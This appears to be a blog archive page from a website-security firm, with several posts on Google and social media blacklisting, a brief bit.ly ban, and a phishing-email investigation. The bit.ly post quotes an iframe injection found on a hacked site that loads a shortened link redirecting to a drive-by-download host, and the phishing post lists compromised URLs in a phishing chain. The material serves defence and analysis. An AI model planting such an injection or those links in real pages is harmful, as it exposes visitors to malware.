Unwanted Software and Harmful Programs

Unwanted Software Google Blacklist

We frequently clean blacklisted websites and submit reconsideration requests to have them de-listed. We have encountered many kinds of blacklist warnings including search engines, anti-virus programs, firewalls and and e-mail spam.

Recently I came across an interesting case where Google was flagging a website due to unwanted software. We were able to get to the bottom of the issue and remove the unwanted malware from the website. In the process we learned a few things and wanted to share them with you as well.

Read More

How Social Media Blacklisting Happens

Social Media Blacklists

In today’s world, we are all browsing websites online and sharing content on a multitude of social media platforms every day. Worldwide social media users exceeded 2 billion back in August 2014, with an adoption rate unlike anything we have seen in history. Social media continues to grow around the world, with active user accounts now equating to roughly 29% of the world’s population. Monthly active user (MAU) figures for the most active social network in each country add up to almost 2.08 billion – a 12% increase since January 2014.

What is Social Media Blacklisting?

Legitimate links on social media platforms are sometimes hijacked by criminals to direct visitors to a website where malware will be automatically downloaded. The more that people share and use social media, the more often these situations will occur. This is why social media platforms have specific security measures to protect their users from being victims of malicious shared content.

In the same way that websites can be blacklisted by Google for having malware hosted on their pages, social media blacklisting occurs when security triggers detect malicious activity, thus placing the infected links on their internal blacklist. Sometimes they can match the URL with the help of an external blacklist authority, such as McAfee, Google, Web of Trust, or Websense.
Read More

My Website Was Blacklisted By Google and Distributing Email Spam

Image by Benson Kua licensed under Creative Commons

Image by Benson Kua licensed under Creative Commons

Being blacklisted by Google is one of the worst things that can happen to a website. The public shame coming from every visitor being stopped by the Big Red Warning page can literally destroy any online business, I am speaking from personal experience before joining the Sucuri team. When a website is blacklisted, users are unable to access the website without specifically agreeing to take on the risks. As a result, blacklisted websites lose around 95% of their traffic.

The following is a true story, based on my personal experience with a blacklisted website. This is actually how I came to know of Sucuri, and how I now work for them as their Social Media Specialist. Have no fear, nothing has been changed; these are real names and events. No additional websites have been harmed during the writing process.

Read More

Google Blacklists Bit.ly

If you ever shortened a URL using bit.ly or if you use it anywhere, be aware that Google recently blacklisted all bit.ly pages through its Safe Browsing program. It means that anyone using Chrome, Firefox or Safari will get a nasty The site ahead contains malware warning when visiting a bit.ly link:

Screen Shot 2014-10-25 at 10.23.45 AM

Why would Google blacklist bit.ly?

Google has many automated processes to detect if a specific domain is hosting malware, redirecting to malware or somehow being misused to compromise other sites (as an intermediary). It flags thousands of sites every day and it seems that the bit.ly had some redirections that were flagged by their detection process.

This is what their diagnostics page say:

What is the current listing status for bit.ly? Site is listed as suspicious – visiting this web site may harm your computer.

Of the 91549 pages we tested on the site over the past 90 days, 721 page(s) resulted in malicious software being downloaded and installed without user consent.

That generally means that someone shortened a URL that was redirecting to a browser exploit kit that was pushing malware to the visitors visiting this page.

Shortened URL malware

Unfortunately, Google is not completely wrong with this one (but likely a bit excessive, time will tell). We constantly see malware injection on websites leveraging shortened URL links. Here is an example of what we mean, this payload was found in a compromised website:

<iframe src="http://bit.ly/1qJGlE0"nbsp;
name="iframe_name" scrolling="no" frameborder="0" allowfullscreen align="top" height="400px" width="720px">

This iframe injection has a bit.ly link that redirects to a drive-by-download hosted at httx://teamliboza[.]nl/streamplayer1.php. It happens often with bit.ly and other URL shortens. This new blacklisting status could be a change in tide for URL shorteners as Google takes a hard stance against how attackers employ them to distribute malware. That or they could be legitimately blocked, it’s just hard to say at the moment.

Whether they are actually hacked or being tagged for what others are doing will require more time and analysis as it’s a very unique situation. For now however, if you depend on the shortening service, if you want people to see your content it’s best to avoid the service until the issue has been resolved.

Additionally, if you leverage the shortener in your own website this could be impactful to you as your website could get inadvertently blacklisted for loading a blacklisted website. Something to be mindful of. The good news is that the blacklist will be for the shortener, so removing it will address the problem, but the bad news is that most end-users won’t read the details and assume it’s you.

We will keep monitoring this issue closely and we will post an update as soon as we hear more. In the mean time, do not visit bit.ly links and replace them with their real final destination URL.

Update 1: After almost 12 hours, Google removed the ban from Bit.ly. They also changed the diagnostics page to:

What is the current listing status for bit.ly?
This site is not currently listed as suspicious.

Phishing Tale: An Analysis of an Email Phishing Scam

Phishing scams are always bad news, and in light of the Google Drive scam that made the rounds again last week, we thought we’d tell the story of some spam that was delivered into my own inbox because even security researchers, with well though-out email block rules, still get SPAM in our inboxes from time to time.

Here’s where the story begins:

Today, among all the spam that I get in my inbox, one phishing email somehow made its way through all of my block rules.

Spam email in our security team's inbox

Even our security team gets SPAM from time to time.

I decided to look into it a little further. Of course, I wanted to know whether or not we were already blocking the phishing page, but I also wanted to investigate further and see if I could figure out where it came from. Was it from a compromised site or a trojanized computer?

The investigation started with the mail headers (identifying addresses have been changed, mostly to protect my email ☺):


The headers tell us that miami.hostmeta.com.br is being used to send the spam. It’s also an alert that some of the sites in this shared server are likely vulnerable to the form: X-Mailer: PHPMailer [version 1.73]. I decided to look into the server and found that it contained quite a few problems. This server hosts about twenty sites, some of which are outdated–WordPress 2.9.2 is the oldest–while others are disclosing outdated web server versions (Outdated Web Server Apache Found: Apache/2.2.22) and still others are blacklisted (http://www.siteadvisor.com/sites/presten.com.br). This makes it pretty difficult to tell where the spam came from, right?

Luckily, there’s another header to help us, Message-ID:. nucleodenegociosweb.com.br is hosted on miami.hostmeta.com.br and it has an open contact form. I used it to send a test message and although the headers are similar, the PHPMailer differs:


What Do We Know Now?

We know who is sending the phishing messages, but what host are they coming from? There are some clues in the message body:


From that image, we can see that http://www.dbdacademy.com/dbdtube/includes/domit/new/ is hosting the image and the link to the phishing scam, but it doesn’t end there. As you can see from the content below, we’ll be served a redirect to http://masd-10.com/contenido/modules/mod_feed/tmpl/old/?cli=Cliente&/JMKdWbAqLH/CTzPjXNZ7h.php, which loads an iframe hosted on http://www.gmff.com.hk/data1/tooltips/new/.

Here is the content:
Phishing email

Problem Solved – Or is It?

In this case, there are three compromised sites being used to deliver the phishing campaign and it’s becoming very common to see this strategy being adopted. The problem from the bad guy’s point of view, is that if they store all of their campaign components on one site, then they lose all of their work when we come in and clean the website. If they split the components up and place them on multiple sites, with different site owners, then it’s unlikely that all of the sites will be cleaned at one time, which means their scam can continue.

As always with malware, it’s not enough for your site to be clean. You also need to rely on everyone else to keep their own site clean. When others don’t, your computer or website can be put at risk.

If you’re interested in technical notes regarding the type of research we do be sure to follow us on Twitter and be sure to check in with our Lab Notes. If you something interesting you’d like us analyze please don’t hesitate to ping us, we’re always looking for a new challenge.

Understanding Google’s Blacklist – Cleaning Your Hacked Website and Removing From Blacklist

Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The idea is to provide you webmasters with the required insight to understand what is going on, and how to troubleshoot things when your website is blacklisted.

Get Your Bearing

While investigating the website, we found that some Google shortened URLs were being loaded and redirecting to http://bls.pw/. Two of the goo.gl links were pointing to Wikipedia images, their icon to be specific, and one was redirecting to http://bls.pw/ shortener.

Read More

Understanding Search Engine Warnings – Part I – Google – This Site May Be Hacked

If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.

Question: I just found out that my site is being flagged on Google’s search engine results page with the message “This site may be hacked”. What does it mean?

Answer: This is a good question and one we see often from our clients. We see it so often that we decided to do a series on each type of blacklist warnings that show up on search engines. These are the warnings that we will cover in this series:

Read More

Google Transparency Report – Malware Distribution

Google just released their Malware Distribution Transparency Report, sharing the amount of sites compromised or distributing malware detected by their systems (Safe Browsing program).

Google’s Safe Browsing program started in 2006 and since has become one of the most useful blacklists to detect and report on compromised sites. They flag around 10,000 different sites per day, which are being used for over 1 billion browser (Chrome, Firefox And Safari) users.

What is really scary from their report is the amount of legitimate compromised sites hosting malware compared to sites developed by the bad guys for malicious purposes. For example, in the first week of Jun/2013, 37,000 legitimate sites were compromised to host malware. At the same time, they only identified around 4,000 sites that were developed for the unique purpose of infecting people.

Read More

Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries show malicious warnings
  • Provide warnings to about 300,000 downloads per day
  • Send thousands of notifications daily to webmasters
  • Sent thousands of notifications daily to Internet Service Providers (ISPs)

Read More

Web Hosting Provider ServerPro Hacked, Defaced, & Blacklisted by Google

Even the pro’s are susceptible to attack. Web hosting provider ServerPro has been compromised and completely defaced. This has been ongoing for more than a few days with no resolution.

ServerPro boasts to have over 200,000 clients over a 10 year stand. Although there is no direct proof that this attack affects a wide portion of their client base, we have seen a few of their clients experiencing the same issue.

If you were to visit the site, which we recommend against, you would get the beautiful Google infection banner:

ServerPro Blacklisted by Google

Read More